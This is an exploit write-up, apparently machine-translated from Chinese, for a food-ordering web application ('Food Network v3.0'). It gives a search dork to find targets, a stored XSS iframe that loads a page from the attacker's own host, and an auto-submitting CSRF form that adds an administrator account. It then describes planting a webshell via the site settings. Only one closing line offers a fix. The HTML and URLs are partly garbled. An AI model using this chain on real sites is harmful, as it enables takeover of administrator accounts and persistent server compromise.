Version: Zhumadian tianzhong Food Network v3.0 commercial version
Keyword: inurl: wenpai_display.asp
XSS Code:
<Iframe src = http: // The domain name of the Space/xss.html <
Html Code:
<Form name = "admin" action = "http: // The domain name of the target site/admin/admin_add_save.asp" method = "POST" onSubmit = "return validate (this) "> <input type =" text "name =" username "value =" here is the account "> <input type =" text "name =" password "value =" here is the password "> <input type =" submit "value =" confirm to submit "name =" B1 "class =" buttonface "> </form> <body onload =" javascript: document. forms [0]. submit () "> </body> <SPAN style =" DISPLAY: none "_ fck_bookmark =" 1 "> </SPAN>
Exp:
First, modify the Html Code and upload it to your space.
Select a store in the order discount, and then select the [online booking] name and phone number to submit the XSS code,
When the [online order] is opened in the background management, the XSS is started, the html form is run, and the management is added successfully.
After adding the domain name, go to the background and insert a sentence in [website settings] to connect to http: // The domain name of the target site/setup. asp
I tested it locally and couldn't connect a sentence. Let's test it. In short, [website settings] are saved to/setup. asp.
Front-end submission:
After opening the online order in the background, add it to management:
Solution: filter the data submitted by the file yuding. asp.